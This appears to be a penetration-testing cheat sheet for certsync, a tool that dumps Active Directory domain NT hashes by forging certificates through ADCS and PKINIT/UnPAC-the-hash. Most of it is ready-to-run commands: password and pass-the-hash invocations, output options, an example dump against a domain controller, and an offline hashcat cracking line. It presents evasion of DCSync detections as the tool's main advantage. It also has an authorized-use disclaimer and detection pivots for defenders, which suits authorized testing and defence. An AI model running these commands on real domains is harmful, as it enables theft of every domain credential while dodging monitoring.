CERTSYNC
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
certsync dumps NTDS.dit (domain hashes) WITHOUT DRSUAPI/DCSync by abusing ADCS: it reads users + the CA cert/key over LDAP, forges certificates via PKINIT/UnPAC-the-hash, and recovers NT hashes. Useful when DCSync is monitored/blocked but ADCS is reachable. Authorized only.
CONCEPT#
# 1. Enumerate domain users via LDAP # 2. Retrieve the CA certificate + private key (needs the rights) # 3. Forge a certificate per user -> PKINIT -> UnPAC-the-hash -> NT hash # No DRSUAPI replication traffic = evades classic DCSync detections
BASIC USAGE#
certsync -u user -p 'Pass' -d corp.lu -dc-ip <dc> -dns-tcp certsync -u user -H :<nthash> -d corp.lu -dc-ip <dc> -ns <dns-ip> certsync -u user -p 'Pass' -d corp.lu -dc-ip <dc> -ns <dc-ip> # -ns / DNS is needed to resolve the CA host for PKINIT
OUTPUT#
certsync ... -o ntds_dump # Output file prefix certsync ... -outputfile hashes # Hashes output # Produces secretsdump-style user:rid:lm:nt::: lines
KERBEROS / AUTH OPTIONS#
certsync ... -k # Use Kerberos auth certsync ... -dc-ip <dc> -ns <dns> # Explicit DC + resolver certsync ... -dns-tcp # DNS over TCP
TUNING / SCOPE#
certsync ... -user-file users.txt # Limit to specific users # Large domains: forging a cert per user takes time; scope where possible
EXAMPLES#
# Dump domain NT hashes via ADCS instead of DCSync certsync -u user -p 'Pass' -d corp.lu -dc-ip 10.0.0.1 -ns 10.0.0.1 \ -o ntds_dump # Pass-the-hash variant with explicit DNS resolver certsync -u user -H :<nthash> -d corp.lu -dc-ip 10.0.0.1 -ns 10.0.0.1 # Crack the recovered NT hashes offline # hashcat -m 1000 ntds_dump.ntds rockyou.txt
NOTES#
- Requires the ability to read the CA certificate + private key (e.g. via a compromised CA admin or ESC-style access) - it is not a no-privilege attack - Its selling point is EVASION: no DRSUAPI/DCSync replication, so detections keyed on 4662 replication rights / DRSUAPI miss it - Pairs with ADCS-ATTACKS.txt (how you get CA access) and CERTIPY (which you already have) for the certificate primitives - Detection pivots to: CA private key access, mass PKINIT/AS-REQ with certs, anomalous certificate issuance (see DEFENDER-KQL / SENTINEL) - Recovered hashes are highly sensitive - handle per FS engagement data-handling rules (encrypt at rest, destroy at close) - Confirm exact flags with 'certsync -h' - options shift across versions